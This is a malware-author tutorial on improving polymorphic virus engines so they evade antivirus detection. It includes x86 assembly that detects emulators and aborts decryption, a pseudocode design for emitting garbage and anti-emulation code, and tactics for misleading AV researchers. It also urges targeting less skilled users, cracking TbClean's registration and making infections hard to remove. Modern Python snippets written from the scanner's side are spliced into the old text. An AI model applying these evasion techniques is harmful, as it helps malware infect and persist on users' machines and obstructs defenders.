Guide to improving Polymorphic Engines
by Rogue Warrior
Table of contents :-

  1. Introduction
  2. Levels of Polymorphism
  3. Polymorphic Virus Detection Methods
  4. Combatting Detection Methods
         Anti-Scan String
         Cryptanalysis
         Generic Decryption
  5. Combatting Analysis of your virus by AV researchers
  6. Planning your engine features
  7. Conclusion

============================================================================

Introduction :-

  This is a guide for those who already know how to make an engine
  but cannot work out why their viruses are still detectable.

  The single purpose of polymorphic viruses is to avoid detection, and
  at the heart of the polymorphic virus is the engine.  It usually
  takes up 30-80% of the virus code, so it is a very important
  component of the virus to have working properly.

  This guide will tell you how polymorphic detectors work in
  order to help you design/make a better engine to defeat scanners.

  Making a good engine takes a good amount of time.  If you don't
  make it correctly you might as well leave it out completely,
  because its main purpose (avoiding detection) will not be achieved!

============================================================================

Levels of Polymorphism :-

  Polymorphism has many levels of sophistication.

  According to Vesselin Bontchev (AV) these are :-

    1. Fixed set of constant decryptors (a.k.a. oligomorphic).
    2. Alternative instructions for a single operation.
    3. Garbage code insertion.
    4. Instruction swapping.
    5. 2+3+4
    ---------------------------------------------------------
    6. Permuting

  #6 is not considered higher than #5; it is simply considered a
  different class.

  I think there is now a 7th class: highly advanced polymorphism
  which is designed to be better than #5.  These engines have the
  following attributes:

    * Heuristic counter-measures
    * Goat counter-measures
    * Emulator counter-measures

  None of these attributes are part of the virus itself; instead they
  are part of the _polymorphic code produced by the virus_.

============================================================================

Polymorphic Virus Detection Methods :-

  There are many methods for detecting polymorphic viruses; here are
  some popular ones:

    - Scan Strings
    - Variable Scan Strings
    - Cryptanalysis
    - Generic Decryptor
    - Heuristics

  Scan Strings ::-
       Works by searching for a pattern of bytes in FIXED positions and a
       FIXED sequence.

       e.g.,

       scan string: aa ?? bb ?? cc
       virus text:  aa xx bb xx cc
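
       A minimal Python sketch of how a scanner might apply a fixed-position
       scan string, assuming "??" means "any single byte" as in the example
       above.  The function names are made up for illustration; real scanners
       are far more optimised than this byte-by-byte loop.

```python
from __future__ import annotations


def parse_scan_string(sig: str) -> list[int | None]:
    """Turn 'aa ?? bb' into [0xAA, None, 0xBB]; None means 'any byte here'."""
    return [None if tok == "??" else int(tok, 16) for tok in sig.split()]


def matches_at(data: bytes, pattern: list[int | None], offset: int) -> bool:
    """True if every non-wildcard byte of the pattern matches at this offset."""
    if offset + len(pattern) > len(data):
        return False
    return all(p is None or data[offset + i] == p for i, p in enumerate(pattern))


def scan(data: bytes, sig: str) -> list[int]:
    """Return every offset where the fixed-position scan string matches."""
    pattern = parse_scan_string(sig)
    return [off for off in range(len(data) - len(pattern) + 1)
            if matches_at(data, pattern, off)]


# 'xx' may be anything, but aa/bb/cc must sit exactly 2 bytes apart.
sample = bytes.fromhex("00 aa 11 bb 22 cc 00")
print(scan(sample, "aa ?? bb ?? cc"))  # [1]
```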

  Variable Scan Strings ::-
       Work by searching for a pattern of bytes in VARIABLE positions
       but in a FIXED sequence.

       e.g.,

       scan string: aa * bb * cc
       virus text:  1. aa xx xx bb xx xx xx xx cc
                    2. aa bb xx xx xx cc
                    3. and so on...
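
       One easy way to sketch a variable scan string is to translate it into
       a bytes regular expression, with each "*" becoming a lazy gap of any
       length.  This is only an illustration using Python's standard "re"
       module.  The optional max_gap limit is my own assumption about how a
       scanner might stop "*" from matching across a whole file.

```python
import re
from typing import Optional


def compile_variable_scan_string(sig: str, max_gap: Optional[int] = None) -> "re.Pattern[bytes]":
    """Translate 'aa * bb * cc' into a bytes regex.

    Fixed bytes must appear in this ORDER; '*' allows any gap between them
    (unbounded, or 0..max_gap bytes if max_gap is given).
    """
    gap = b".*?" if max_gap is None else b".{0,%d}?" % max_gap
    parts = [gap if tok == "*" else b"\\x%02x" % int(tok, 16) for tok in sig.split()]
    # DOTALL so that '.' also matches the byte 0Ah.
    return re.compile(b"".join(parts), re.DOTALL)


sig = compile_variable_scan_string("aa * bb * cc")
print(sig.search(bytes.fromhex("aa 01 02 bb 01 02 03 04 cc")) is not None)  # True
print(sig.search(bytes.fromhex("aa bb 01 02 03 cc")) is not None)           # True
print(sig.search(bytes.fromhex("bb aa cc")) is not None)                    # False
```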

  Cryptanalysis ::-
       Works by finding part of the VIRUS BODY and then performing some
       very basic cryptanalysis on it and then decrypting it (if possible).

       According to many AV vendors this method is not used anymore (due to
       the effectiveness of Generic Decryptor), but I will tell you how to
       defeat it anyway just to be sure ;-) -- it's not hard to defeat.
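
       To make "very basic cryptanalysis" concrete, consider a body encrypted
       with a single XOR byte.  If the scanner knows a few plaintext bytes of
       that body, it can simply try all 256 keys.  Below is a minimal Python
       sketch from the scanner's point of view.  The body, key and known
       fragment are made-up test data.

```python
from typing import Optional, Tuple


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same one-byte key (encryption == decryption)."""
    return bytes(b ^ key for b in data)


def find_xor_key(ciphertext: bytes, known_plain: bytes) -> Optional[Tuple[int, int]]:
    """Brute-force all 256 keys; return (offset, key) of the first hit, or None."""
    for key in range(256):
        off = ciphertext.find(xor_bytes(known_plain, key))
        if off != -1:
            return off, key
    return None


body = b"\x00\x01HELLO-SIGNATURE\x02"   # stand-in for a decrypted body
encrypted = xor_bytes(body, 0x5A)        # what the scanner actually sees
hit = find_xor_key(encrypted, b"HELLO-SIG")
print(hit)                                # (2, 90)
offset, key = hit
print(xor_bytes(encrypted, key) == body)  # True
```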

  Generic Decryptor (a.k.a. Emulation) ::-
       Works by emulating the instructions of the polymorphic decryptor so
       that the virus decrypts itself; the virus is then detected with a
       standard scan string.

  Heuristics ::-
       This has undeservedly been a virus buzzword for a long time.  Beating
       heuristics has been the target of many polymorphic engine creators,
       which shows how little they know about polymorphic detection.

       This method involves searching for inconsistencies between the code
       being analysed and normal everyday code found in programs.

       While it is important - it is not THAT important and will not help you
       stop being detected by anti virus software.

       It is important to note that heuristics is not used very much (they
       do use a bit) in the most popular AV programs (F-PROT, McAfee and AVP)
       these are the programs you should target. Do not target programs which
       only hard core virus people use.  Most of the hard core AV software
       could spot a virus anyway. -- in other words: _target the less
       intelligent software users_

============================================================================

Combatting Virus Detection Methods :-

----------------------------------------------------------------------------

  - Anti Scan String methods

   This is really easy: avoid code that is common to every decryptor.
   Just because some code isn't in the same position doesn't mean it
   cannot be scanned, though.  For example:

    xx=garbage code.

    Your Decryptor #1 (as hexadecimal):

     45 34 xx xx xx 54 80 xx xx xx 12 xx xx xx 34 32 xx xx xx 43 xx xx xx xx

    Your Decryptor #2:

     xx xx xx 45 30 xx xx xx xx xx 54 81 xx xx xx xx xx 12 xx xx 34 32 xx 43

   Looking at this code you can see an obvious pattern; it can be scanned
   using this string:

        45 3? * 54 8? * 12 * 34 32 * 43

        Legend:
          ?     - matches any value in this hex digit (nibble) position only
          *     - matches anywhere from 0 up to N bytes
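
   The signature above can be tried out with a small Python sketch that
   turns it into a bytes regular expression.  The token rules are my own
   assumptions, not any particular scanner's syntax:

     ??  - a whole wildcard byte
     3?  - fixes the high nibble and leaves the low one free
     *   - stands for 0 to max_gap bytes (max_gap is a hypothetical
           parameter)

   The "xx" garbage bytes are filled with 90h for the test.

```python
import re


def compile_scan_string(sig: str, max_gap: int = 8) -> "re.Pattern[bytes]":
    """Translate e.g. '45 3? * 54 8?' into a bytes regex."""
    parts = []
    for tok in sig.split():
        if tok == "*":                  # 0..max_gap bytes of anything
            parts.append(b".{0,%d}?" % max_gap)
        elif tok == "??":               # any single byte
            parts.append(b".")
        elif tok.endswith("?"):         # high nibble fixed, low nibble free
            hi = int(tok[0], 16) << 4
            parts.append(b"[\\x%02x-\\x%02x]" % (hi, hi | 0x0F))
        else:                           # exact byte
            parts.append(b"\\x%02x" % int(tok, 16))
    return re.compile(b"".join(parts), re.DOTALL)


SIG = compile_scan_string("45 3? * 54 8? * 12 * 34 32 * 43")

# The two example decryptors from above, with every 'xx' replaced by 90h.
decryptor1 = bytes.fromhex("45 34 90 90 90 54 80 90 90 90 12 90 90 90 34 32 90 90 90 43 90 90 90 90")
decryptor2 = bytes.fromhex("90 90 90 45 30 90 90 90 90 90 54 81 90 90 90 90 90 12 90 90 34 32 90 43")

print(SIG.search(decryptor1) is not None)  # True
print(SIG.search(decryptor2) is not None)  # True
```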


  This will identify this decryptor (not the virus) by looking for code common
  to each decryptor.  So how do you combat it?  Well try making sure that you
  always have at LEAST 1 alternative to every instruction your engine can
  generate.

  NOTE: Make enough alternatives that it makes multiple variable scan strings
        not an option to AV!

----------------------------------------------------------------------------
Cryptanalysis :-

        This is very easy to defeat - simply add multiple encryption
        operations, for example:

        A loop using a single XOR with byte/word is very easy to cryptanalyse
        but a loop using XOR b/w, ADD b/w, SUB b/w, ROL b/w in one loop is
        VERY hard to cryptanalyse.

        The only problem with this is applying the encryptions in reverse
        order to that of your virus decryptor so that when the virus
        decryptor is run it will do it in the correct ordering.

        There is an easy way to do this! -- There isn't really I was just
        joking there is no easy way =)

        You can leave this bit out anyway, because as far as I know all AVs
        are using Generic Decryption.

----------------------------------------------------------------------------

Generic Decryption :-

       This method is very popular amongst AV and requires the cooperation
       of the virus to work.  If a virus can detect it is being emulated
       and then throw an emulator off by some method then it will defeat
       this method.

       Products known to be using this technique are: F-PROT AVP TBAV DSAV
       (and I would guess McAfee?).

       How does generic decryption work?  Each AV product contains a
       small software emulator of the Intel CPU.  It does not allow
       instructions to actually execute but simulates them closely enough,
       in certain controlled ways, to make the virus decrypt itself in a safe
       environment.  This way all they need is a scan string, even for a very
       complex polymorphic virus!
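
       Here is a toy Python sketch of the idea from the scanner's side.
       To keep it short it does NOT emulate x86.  Instead it runs a tiny
       made-up instruction set ("set", "xorb", "inc", "dec", "jnz",
       "halt"), which is entirely hypothetical.  The step budget is my own
       stand-in for the "controlled ways" mentioned above.  Real emulators
       use their own, much more elaborate limits.

```python
from typing import Dict, List, Optional, Tuple

Instr = Tuple  # e.g. ("set", "cnt", 12) or ("jnz", "cnt", 3); HYPOTHETICAL toy ISA


def emulate(program: List[Instr], memory: bytearray, max_steps: int = 10_000) -> Optional[bytearray]:
    """Run the toy program on a private copy of memory.

    Returns the final memory on 'halt', or None if the step budget runs out
    (the scanner's guard against endless loops).
    """
    mem = bytearray(memory)            # never touch the real file image
    regs: Dict[str, int] = {}
    pc = 0
    for _ in range(max_steps):
        op, *args = program[pc]
        if op == "halt":
            return mem
        if op == "set":
            regs[args[0]] = args[1]
        elif op == "xorb":             # mem[ptr] ^= key
            mem[regs[args[0]]] ^= regs[args[1]]
        elif op == "inc":
            regs[args[0]] += 1
        elif op == "dec":
            regs[args[0]] -= 1
        elif op == "jnz":
            if regs[args[0]] != 0:
                pc = args[1]
                continue
        else:
            raise ValueError(f"unknown instruction {op!r}")
        pc += 1
    return None


def generic_scan(program: List[Instr], image: bytes, signature: bytes, max_steps: int = 10_000) -> bool:
    """Let the 'decryptor' decrypt the image, then apply an ordinary scan string."""
    result = emulate(program, bytearray(image), max_steps)
    return result is not None and signature in result


body = b"\x00\x01SIGNATURE\x02"       # stand-in for a body
image = bytes(b ^ 0x37 for b in body)  # encrypted with a one-byte XOR key
decryptor = [
    ("set", "ptr", 0),
    ("set", "cnt", len(body)),
    ("set", "key", 0x37),
    ("xorb", "ptr", "key"),            # loop start (index 3)
    ("inc", "ptr"),
    ("dec", "cnt"),
    ("jnz", "cnt", 3),
    ("halt",),
]
print(b"SIGNATURE" in image)                         # False: plain scan misses it
print(generic_scan(decryptor, image, b"SIGNATURE"))  # True
```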

       These controlled conditions stop endless loops and other similar
       bugs in normal programs from hanging the emulator.  I
       experimented and found that making a 10 KB decryptor on a virus will
       dramatically slow down scanning in DSAV and AVP because the emulator
       is actually simulating the code.  I made 10 x 10KB samples and these
       took over 3 minutes to be examined by DSAV and AVP however each of
       these took only milliseconds to run normally.

       This shows that the emulators in DSAV and AVP are really quite good and
       don't give up easily when trying to decrypt a virus (I used the /ANALYSE
       option on DSAV).  F-PROT and TBSCAN did not emulate these samples
       correctly even with maximum heuristics enabled or if they did they must
       have discovered how to simulate INCREDIBLY quickly (even TBSCAN being
       written in assembly language cannot run them that fast).

       So how do we stop this emulation taking place? or better put: How do we
       detect ourselves being emulated and throw the emulator off?

       e.g., Imagine we know that the PSP contains a certain constant value at
       ALL times - but we also know the emulator doesn't emulate the PSP.
       With this knowledge we can construct some code in our polymorphic
       DECRYPTOR to detect this and throw the emulator off:

       mov      ax,[0000]
       sub      ax,20CDh
       jz       ok
       mov      ah,4Ch
       int      21
       ok:

       Note: This code must be in the decryptor because its goal is to stop
       decrypting BEFORE we reach the virus body.  This code must be
       generated with the same principles of variability that all other poly
       code requires - if you don't make this code variable also then you risk
       having the code used against you to detect the virus!!!

  Possible methods to exploit for detecting and terminating emulation:

     - Inability of DOS call return values to be predicted by the emulator
       without actually calling them.  i.e., we can make a DOS call in the
       poly code and check the return values.  If they are not consistent with
       a REAL call to that function then it can be assumed we are being
       emulated and then take evasive action.

     - Inability of emulator to write to ALL of memory.  By writing to safe
       areas in RAM we can test if that area has ACTUALLY been written
       to by the virus or just emulated.  If it has not been written to
       then we assume emulation in progress.

e.g., long winded version:

       cli                      ;disable ints
       cld                      ;set data string copy direction
       push     6000h
       pop      ds              ;any segment which AV and virus don't own.
       push     ds
       pop      es              ;es=ds=6000h
       sub      si,si
       mov      di,0002
       lodsw                    ;save in ax, si=di=2
       xor      ds:[0000],1234h ;write
       mov      cx,0f000h       ;some large amount
L1:    rep      movsw           ;write to memory (a large amount is better)
       cmp      ds:[0000],ax    ;did the AV forget about the write?
       mov      ds:[0000],ax    ;set it back to normal regardless
       jz       not_emulated    ;seems they messed up remembering where we
                                ;wrote.
       mov      ah,4Ch
       int      21h             ;bye Mr Emulator.

not_emulated:

     - Inability of emulator to emulate all control structures (PSP, MCB,
       SFT, etc).

       Most emulators can emulate the PSP, MCB and so on but every single
       structure would take too much memory and processing so trying to
       exploit this possible weakness is a good idea.

       TbClean a program which emulates viruses to disinfect programs
       only emulates certain small parts of the PSP leaving other parts to
       be exploited by emulation trapping.  In fact one can trick TbClean
       into converting the virus infected file into an infected Trojan horse
       program for the person who runs it next.

       NOTE: TbClean is good fun for testing your polymorphic decryptors
       it shows you how the emulator is going to go through your code like
       a hot knife through butter.  Make sure to crack the registration on
       TbClean so you can use it properly <grin>.

  - Limited resources of an emulator.

        Remember that many AV programs are built to be fast so by making your
        virus take a very long time (in AV program terms) to analyse your
        virus might make it quit thinking that it has encountered an endless
        loop.

        However! running a time consuming decryptor normally takes next to
        no time.  So we can see that resources of time, memory, processing
        power all contribute to methods for killing off an AV scanner
        emulator.

        *** You must think how to detect and force the emulator to quit ***

============================================================================

Stopping analysis of your virus by AV researchers

    AV researchers are the ones responsible for making your virus detectable
    so having some ways to hinder AV researchers doing analysis of your
    polymorphic virus and engine is always good to throw in.

    The most common way to analyse a new polymorphic virus is to generate
    1000's of samples of your virus.  This involves activating the virus on a
    test computer and executing 1000's of goat programs.

    The goal in generating these 1000's of copies is to get a good sampling of
    what the engine can generate and then test the detection method against
    it.

    If your virus chooses only to show a certain sample then their detector
    may work in the Lab but not when it comes to "in the wild" situations.

    Of course it is best to not make it obvious to AV that you are trying
    to do this or they might catch on and alter their methods.

============================================================================

Planning your engine features

  It's always a good idea to have a plan of the engine structure.

  Many coders spend their time byte-fiddling trying to optimise
  their code - this method of planning enables you to block-fiddle
  - each of these blocks can be shuffled and optimised meaning
  every change for the better is saving you lots of bytes instead
  of 1-2 bytes.

  NOTE: NEVER place ANY code in a CALL/RET routine unless it
        is used more than once!

  A polymorphic engine is very similar to the code generation
  phase of a compiler - most compiler writers use the word "emit" [1]
  as the word to say they're outputting code.  So try to use
  the same because it's good to follow this standard when
  planning your engine.

  [1]: Means "output" or "give off" for those bad at English.

  e.g., Here is a very basic model of an engine plan
        (you may want to add more detail than this
         to any plan you make):

   Engine:
     EmitDecryptor

   EmitDecryptor:
     repeat EmitGarbage & EmitAntiEmulation, random(5) times
     EmitSetupRegs
     repeat EmitGarbage & EmitAntiEmulation, random(5) times
     MarkLoopStart
     repeat EmitDecryptionCode, random(5) times
     repeat EmitGarbage & EmitAntiEmulation, random(5) times
     EmitEndLoop
     repeat EmitGarbage & EmitAntiEmulation, random(5) times
   End-EmitDecryptor

   EmitGarbage:
     Randomly Select 1 of:
       EmitFakeINT21   - randomly select some int 21 functions
       EmitFakeINT10   - randomly select some int 10 functions
       EmitCMPbmemXX   - cmp byte ptr [xxxx],xx
       EmitCMPwmemXXXX - cmp word ptr [xxxx],cccc
       EmitMOVbmemXX   - mov byte ptr [xxxx],cc
       EmitMOVwmemXXXX - mov word ptr [xxxx],cccc
       EmitMOVbregXX   - mov rb,cc
       EmitMOVwregXXXX - mov rx,cccc
       EmitMOVbregMEM  - mov rb,byte ptr [xxx]
       EmitMOVwregMEM  - mov rw,byte ptr [xxxx]
       EmitCALL        - CALL xxxx/garb/jmp yyyy/garb/xxxx:/garb/ret/yyyy:
       EmitJMP         - JMP xxxx/garb/xxxx:
   End-EmitGarbage

   EmitAntiEmulation:
     Randomly Select 1 of:
       EmitFarCALL       - place RETF into mem/CALL yyyy:xxxx
       EmitFarJMP        - place Far JMP into mem/JMP yyyy:xxxx
       EmitWriteAndTest  - write to known RAM mem, test it changes, if not
                           crash
       EmitFakeExit      - set int 21 = virus_cs:virus_return and call
                           ah=4c, int 21
       EmitPSPcheck      - cmp ds:[0000],21CDh/jnz crash: use better check!
                           just an example.
       EmitDOScheck      - dos call/check return value is consistent.
   End-EmitAntiEmulation

   EmitSetupRegs:
     If Boolean Then
       LoopType = Counter or Pointer
       Select Count Register from [AX,BX,CX,DX,SI,DI]
       Select Pointer Register from [SI,DI,BP]
     Else
       LoopType = Pointer
       Select Pointer Register from [SI,DI,BP]
     End If
   End-EmitSetupRegs

   MarkLoopStart:
     Save output pointer (usually DI register) to remember loop location.
   End-MarkLoopStart

   EmitDecryptionCode:
     Randomly select 1 of:
       EmitXORptr
       EmitADDptr
       EmitSUBptr
   End-EmitDecryptionCode

   EmitEndLoop:
     If LoopType=Counter and Counter=CX and Boolean Then
       EmitLoop
     Else If LoopType=Counter and Boolean Then
       EmitDECJNZ
     Else If LoopType=Counter and Boolean Then
       EmitDECJZJMP
     Else If LoopType=Pointer and Boolean Then
       EmitDECCMPJNZ
     Else If LoopType=Pointer and Boolean Then
       EmitDECCMPJZJMP
     End
   End-EmitEndLoop

   This is just a simple example of a plan so you can see how to
   structure your engine - do not forget these parts:

     - encrypting the virus body in reverse order and
       reverse operation.

     - adjusting for execution location in memory:
       if the entry point of the virus is not at a zero
       offset then you must adjust all memory references
       and pointers by the relocation amount.

       This part is usually done while emitting.

============================================================================

Conclusion

    If you are going to go to the trouble of making a polymorph engine then do
    it right and don't waste 1-3Kb of code on an engine which can be
    generically decrypted.

    If you are going to make a good engine remember the following points:
       - it must not have fixed bytes in fixed positions.
       - it must not have fixed bytes in variable positions.
       - it must not be able to be decrypted by generic decryption engines
         in AV software.
       - it helps if the code is heuristically "clean" but it is not the be
         all and end all of an engine to be this way.
       - make sure it is a bitch to analyse by AV.
       - make sure it is a bitch to remove if it does get caught.

The final pain in the ass

    Some AV are obsessed with EXACT detection - even if they are able to
    detect your decryptor (as they do with many TPE-based viruses), in
    the end they always want exact detection.  So try to make your engine
    such a hard ass that it might allow detection of the actual "decryptor"
    part but NOT the virus body - This will be a great annoyance to the AV
    (even though they may say otherwise).

    Remember inexact detection leads to inability to remove the virus and
    if your virus ever becomes common they will have to answer the customer's
    question "why can't you remove it?".